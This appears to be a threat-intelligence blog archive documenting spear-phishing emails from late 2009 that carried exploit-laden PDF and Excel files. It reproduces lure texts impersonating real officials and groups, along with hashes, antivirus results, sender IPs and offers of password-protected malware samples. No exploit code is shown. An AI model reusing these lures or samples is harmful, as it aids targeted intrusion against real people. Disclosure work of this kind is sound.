Jan 4 CVE-2009-4324 Adobe 0 Day "Global Views Survey Research Center- President Ma satisfaction poll" from liontai@gmail.com Jan 4, 2010 10:04

Download CVE-2009-4324 samples. (Password protected archive. Use the same password you used on the CVE-2009-4324 samples or contact me for the password)


Details: 200912_GVSRC_others.pdf - 5cdd8b5916c9bceab084c4d569633fa (to be added later..)


From: 戴立安(gmail) [mailto:liontai@gmail.com]
Sent: Monday, January 04, 2010 10:04 PM
To: Undisclosed-Recipient:@yahoo.com
Subject: 遠見民調中心最新調查_「美國與兩岸領導人暨主要政黨信任度、馬總統滿意度」民調
Importance: High

遠見民調中心最新調查結果
 

「美國與兩岸領導人暨主要政黨信任度、
馬總統滿意度」民調

 
--------------------------------------------------------
         遠見雜誌民調中心主任  戴立安
                      Director  Li-an Tai
       Global Views Survey Research Center
          www.gvm.com.tw/gvsrc/index.asp
 
           104 台北市松江路93巷1號
           行動:0916-828-482
           電話:02-2517-3688分機638
           專線:02-2517-8537
           傳真:02-2517-6275
           email:liantai@cwgv.com.tw
                        lion.tai@gmail.com
 --------------------------------------------------------
 遠見.天下文化事業群
 遠見雜誌 * 30雜誌 * 天下文化 * 小天下
 哈佛商業評論--全球中文版 * 大小媒體
 --------------------------------------------------------

Translation of the message above:

From: Li-an Tai (gmail) [mailto:liontai@gmail.com]
Sent: Monday, January 04, 2010 10:04 PM
To: Undisclosed-Recipient:@yahoo.com
Subject: Global Views Survey Research Center's latest survey: poll on "trust in the US and cross-strait leaders and major political parties, and President Ma's satisfaction rating"
Importance: High

Latest poll results from the Global Views Survey Research Center

Poll on "Trust in the US and cross-strait leaders and major political parties,
and President Ma's satisfaction rating"

--------------------------------------------------------
         Li-an Tai, Director, Global Views Monthly Survey Research Center
       Global Views Survey Research Center
          www.gvm.com.tw/gvsrc/index.asp

           No. 1, Lane 93, Songjiang Road, Taipei 104
           Mobile: 0916-828-482
           Tel: 02-2517-3688 ext. 638
           Direct line: 02-2517-8537
           Fax: 02-2517-6275
           email: liantai@cwgv.com.tw
                  lion.tai@gmail.com
 --------------------------------------------------------
 Global Views / Commonwealth Publishing Group
 Global Views Monthly * 30 Magazine * Commonwealth Publishing * Global Kids
 Harvard Business Review, Global Chinese Edition * Big & Small Media
 --------------------------------------------------------

Sunday, January 3, 2010

Jan 3 2009 CVE-2009-4324 PDF DoD UAS ATC Procedures from matthew.s.allen2@gmail.com Sun, 3 Jan 2010 22:46:25 -0600


Download DoD_UAS_Class_D_Procedures.pdf as 115A25093CB9062CC155508CDF878ACE-DoD_UAS_Class_D_Procedures.zip (password protected archive, please contact me for the password)


From: Allen, Matthew S Maj MIL USAF AF/A3O-AS [mailto:matthew.s.allen2@gmail.com]
Sent: Sunday, January 03, 2010 11:46 PM
Subject: 2009 DoD UAS ATC Procedures


Enclosed are revised ATC procedures for DOD Non-Joint-Use Airfields with associated Class D Airspace to operate DOD Unmanned Aircraft Systems for Service use effective on January 21, 2009. Please feel free to contact COL Robert Hess, who chaired the DOD UAS ATC procedures working group, at (703)806-4862, with any questions.


Signed; 04 Jan 10
Allen, Matthew S Maj
USAF AF/A3O-AS
DSN:703-697-8035
The message sender was matthew.s.allen2@gmail.com
The message originating IP was 209.85.223.196
The message recipients were xxxxxxxxxxxx
The message was titled 2009 DoD UAS ATC Procedures
The message date was Sun, 3 Jan 2010 22:46:25 -0600
The message identifier was <9ae646dc1001032046i4f73e0cl8d6f3751020f0880@mail.gmail.com>
attach/5963820_3X_PM5_EMS_MA-PDF__DoD=5FUAS=5FClass=5FD=5FProcedures=5F=28signed=29.pdf: Infected: Exploit.JS.Pdfka.adn [AVP]


Virustotal
 http://www.virustotal.com/analisis/1769c9eb8fdb4942176ca2172de118df294ae785c03cca70bd6fee0c74dad2ce-1262924110

CVE-2009-4324  - Update Aug 26, 2010

 http://www.virustotal.com/analisis/1769c9eb8fdb4942176ca2172de118df294ae785c03cca70bd6fee0c74dad2ce-1274670528
File DoD_UAS_Class_D_Procedures__signe  received on 2010.05.24 03:09:12 (UTC)
Result: 24/41 (58.54%)
Antivirus     Version     Last Update     Result
a-squared    4.5.0.50    2010.05.10    Exploit.JS.Pdfka!IK
AhnLab-V3    2010.05.23.00    2010.05.22    PDF/Exploit
AntiVir    8.2.1.242    2010.05.23    EXP/Pidief.244965
Authentium    5.2.0.5    2010.05.23    PDF/Expl.GQ
BitDefender    7.2    2010.05.24    Exploit.PDF-JS.Gen
CAT-QuickHeal    10.00    2010.05.21    Exploit.PDF.FlateDecode
ClamAV    0.96.0.3-git    2010.05.22    Exploit.PDF-6260
Comodo    4927    2010.05.24    UnclassifiedMalware
DrWeb    5.0.2.03300    2010.05.24    Exploit.PDF.687
eTrust-Vet    35.2.7503    2010.05.21    PDF/Pidief.G!generic
F-Prot    4.6.0.103    2010.05.23    PDF/Pidief.BO
F-Secure    9.0.15370.0    2010.05.23    Exploit.PDF-JS.Gen
GData    21    2010.05.24    Exploit.PDF-JS.Gen
Ikarus    T3.1.1.84.0    2010.05.24    Exploit.JS.Pdfka
Kaspersky    7.0.0.125    2010.05.23    Exploit.JS.Pdfka.adn
McAfee    5.400.0.1158    2010.05.24    Exploit-PDF.b
McAfee-GW-Edition    2010.1    2010.05.23    Exploit-PDF.b
Microsoft    1.5802    2010.05.24    Exploit:JS/Heapspray
Norman    6.04.12    2010.05.23    JS/Shellcode.HQ
nProtect    2010-05-23.01    2010.05.23    Exploit.PDF-JS.Gen
PCTools    7.0.3.5    2010.05.24    Trojan.Pidief
Sophos    4.53.0    2010.05.24    Troj/PDFJs-GQ
Sunbelt    6346    2010.05.24    Trojan.PDF.Pidief.b (v)
Symantec    20101.1.0.89    2010.05.24    Trojan.Pidief
Additional information
File size: 890083 bytes
MD5...: 115a25093cb9062cc155508cdf878ace


Wepawet
benign
http://wepawet.cs.ucsb.edu/view.php?hash=115a25093cb9062cc155508cdf878ace&type=js

Wednesday, December 30, 2009

Dec. 29 CVE-2008-3005 / MS08-043 Darkmoon RAT Excel Russia Foreign Minister Meeting from spoofed daisuke_hasegawa@mofa.go.jp Dec 2009 06:50:10 -0000


Download the infected Excel file 1229.xls plus extracted bin files as 1229+bin files.zip (password protected archive, you need to contact me for the password)

            


This message was received from a spoofed email address of an official at the Foreign Ministry of Japan. The message came from China; it is crafted to install a remote administration tool known as Darkmoon (similar to ProRAT). I will post more details as soon as I can.

  On December 28, Minister Okada held a Japan-Russia foreign ministers' meeting with Foreign Minister Lavrov in Moscow and also met with Presidential Administration Chief Naryshkin; the outline of the results is as follows.

      [Key points]

    ● At the foreign ministers' meeting, Minister Okada said that the Hatoyama administration wants to move politics and the economy forward together like the two wheels of a cart; that while Japan-Russia relations are advancing under the Japan-Russia Action Plan, there has been no visible progress on the question of the territories' attribution; that efforts must be made at the foreign-minister level as well so that concrete progress can be made on the territorial issue; and that Japan asks the Russian side to deal with the attribution question in a way that takes Japan's position into account.

    ● Foreign Minister Lavrov explained that diplomacy with Japan is a priority for Russian foreign policy and, on the territorial issue, set out the Russian side's position of principle, saying that Russia has no intention of artificially delaying a resolution and that international law and the outcome of the Second World War must be taken into account.


....................... see the full text at the end of the post. The text is actually copied from the website of the Foreign Ministry of Japan (here is the page from the Google cache)
         ------------------------------------------------
    Daisuke HASEGAWA
    International Counter-Terrorism Cooperation Division Foreign Policy Bureau, Ministry of Foreign Affairs
    TEL: 03-5501-8000 ext.4180, FAX: 03-5501-8205 daisuke_hasegawa@mofa.go.jp



Monday, December 28, 2009

Dec. 28 CVE-2009-4324 Adobe 0-day "consumer welfare table" from gwsm01@gwsm.gov.tw Mon, 28 Dec 2009 22:08:05 +0800

Download  CVE-2009-4324 samples (Password protected archives. Use the same password you used on the samples above or contact me for the password)

Details: 99年(春節)消費者福利表.pdf -  c61c231d93d3bd690dd04b6de7350abb


From: 國防部福利總處 [Ministry of National Defense General Welfare Service] [mailto:gwsm01@gwsm.gov.tw]
Sent: 2009-12-28 8:03 AM
To: xxxxxx
Subject: 檢送國防部福利總處99年(春節)消費者福利表文件乙份,請查照! [Forwarding one copy of the MND General Welfare Service's year-99 (Lunar New Year) consumer welfare table, please review]

For details, visit the MND General Welfare Service at http://www.gwsm.gov.tw/

Service hotline: (02)2392-2377
Address: No. 3, Sec. 1, Xinyi Road, Taipei
P.O. Box: Taipei P.O. Box 90036
Website maintenance: General Information Section, ext. 709


Dec. 28 CVE-2009-4324 Adobe 0 Day best wishes from delaney955@yahoo.com Mon, 28 Dec 2009 22:28:01 PST

Download CVE-2009-4324 samples. (Password protected archive. Use the same password you used on the CVE-2009-4324 samples or contact me for the password)

Details: best wishes.pdf - 4661f1f3553899edd953e448bcab3078

There are many poorly written postcards for this zero day CVE-2009-4324; here is one more, and probably the last one.


From: Delaney Kay [mailto:delaney955@yahoo.com]
Sent: Tuesday, December 29, 2009 1:28 AM
To: delaney955@yahoo.com
Subject: Subject: best wishes

   Wishing  you  and  your family a happy and safe
 holiday seasion  and productivein 2010. Keep in turch. 




Saturday, December 26, 2009

Dec.26 CVE-2009-4324 Adobe 0 Day Christmas Greetings from H.H. the Dalai Lama from test01@humanright-watch.org Sat, 26 Dec 2009 20:58:47 +0800


Download CVE-2009-4324 files (Password protected archive. Use the same password you used on the samples above or contact me for the password)

Details: Greetings.pdf - 2a7b8180da2906c9889f13fa912df6a0

From: test01@humanright-watch.org on behalf of Kate Saunders [kates@ictibet.org]
Sent: Sat 12/26/2009 8:02 AM
To:
Subject Christmas Greetings from H.H. the Dalai Lama
Attachment Greetings.pdf (81 KB)

Dear Friend of Tibet. Sincerely thank you for the support of the Free Tibet Campaign. I extend you Christmas blessings on behalf of the Dalai Lama. Attachment is a letter sent to you from H.H. the Dalai Lama.
Tashi Delek!

Kate Saunders.ICT
1852 Jefferson Place NW
Washington, DC 20036
Tel 1-202-580-6716
Cell:1-202-375-4398
emai1:kates@ictibet.org
www.savetibet.org


Sender (see header at the end of the post) Sat, 26 Dec 2009 20:58:47 +0800 (CST)
Received: from krilwftlv (203186054193.static.ctinets.com [203.186.54.193]


Hostname:203186054193.static.ctinets.com
ISP:City Telecom (H.K.) Ltd.
Organization:FIRST NETWORK COMMUNICATIONS LTD - FAVOR INDUSTRIA
Country:Hong Kong
Central District